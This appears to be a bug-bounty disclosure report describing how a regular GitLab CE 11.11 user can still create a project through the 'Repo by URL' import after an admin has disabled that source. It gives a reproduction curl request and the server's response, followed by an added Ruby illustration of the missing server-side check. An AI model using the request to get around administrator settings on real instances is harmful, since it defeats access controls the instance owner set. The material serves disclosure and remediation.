ESCALATED: Bypass Disabled Repo by URL Project Creation
HackerOne report #630263 by ngalog
on 2019-06-26, assigned to estrike
Summary
As an admin, you can disable the Repo by URL project creation import source on the admin page https://:gitlab_instance/admin/application_settings
However, a regular user can still import a project using Repo by URL regardless of that setting.
Steps to reproduce
- As an admin, disable the Repo by URL import source in /admin/application_settings/general under Visibility and access controls
- As a regular user, run the following curl command:
curl 'http://gitlab.local/-/projects' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H "Cookie: $COOKIE" \
--data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"
This command sends a request equivalent to what happens when using the Repo by URL
import method in the UI. It imports the gitlab-org/release-cli
project by URL. In my case I got the response
<html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html>
and the project was imported anyway.
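The guard that the report shows is missing on the server side, written here as an added illustration (not code from the report or from GitLab): it parses the same form-encoded body the curl command sends, treats any non-empty project[import_url] as a Repo by URL import, and refuses the create when that import source is not in the admin's enabled list. The setting key "git" for Repo by URL and the enabled-sources list are assumptions.

```ruby
require 'uri'

# Constructed stand-in for the admin setting under Visibility and access
# controls. "git" is assumed to be the key for "Repo by URL"; here it is
# deliberately absent, i.e. the admin has disabled that import source.
ENABLED_IMPORT_SOURCES = %w[github gitlab_project].freeze

# Parse an application/x-www-form-urlencoded body into a flat hash keyed by
# the raw Rails-style names, e.g. "project[import_url]" => "https://...".
def parse_form_body(body)
  URI.decode_www_form(body).to_h
end

# Server-side enforcement of the import-source setting. A project create
# request carrying an import_url is a Repo by URL import, so it must be
# refused whenever the admin has disabled that source, no matter what the
# UI hides. Returns [:ok, nil] or [:forbidden, reason].
def authorize_project_create(params, enabled_sources)
  import_url = params['project[import_url]'].to_s.strip
  return [:ok, nil] if import_url.empty? # plain create, nothing to import
  unless enabled_sources.include?('git')
    return [:forbidden, 'Repo by URL import source is disabled by the administrator']
  end
  [:ok, nil]
end

# Constructed request body, trimmed from the curl --data-raw in the report.
REQUEST_BODY = 'utf8=%E2%9C%93' \
               '&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git' \
               '&project%5Bname%5D=Importing+Even+If+Disabled' \
               '&project%5Bpath%5D=importing-even-if-disabled'

if __FILE__ == $PROGRAM_NAME
  status, reason = authorize_project_create(parse_form_body(REQUEST_BODY), ENABLED_IMPORT_SOURCES)
  puts "#{status}: #{reason}" # forbidden: Repo by URL import source is disabled by the administrator
end
```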
Impact
Bypass of project creation despite the admin setting explicitly disallowing it
What is the current bug behavior?
Project creation by Repo by URL succeeds even though the admin setting explicitly disallows it
Reproduced on GitLab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383)
Impact
Bypass of project creation restrictions via Repo by URL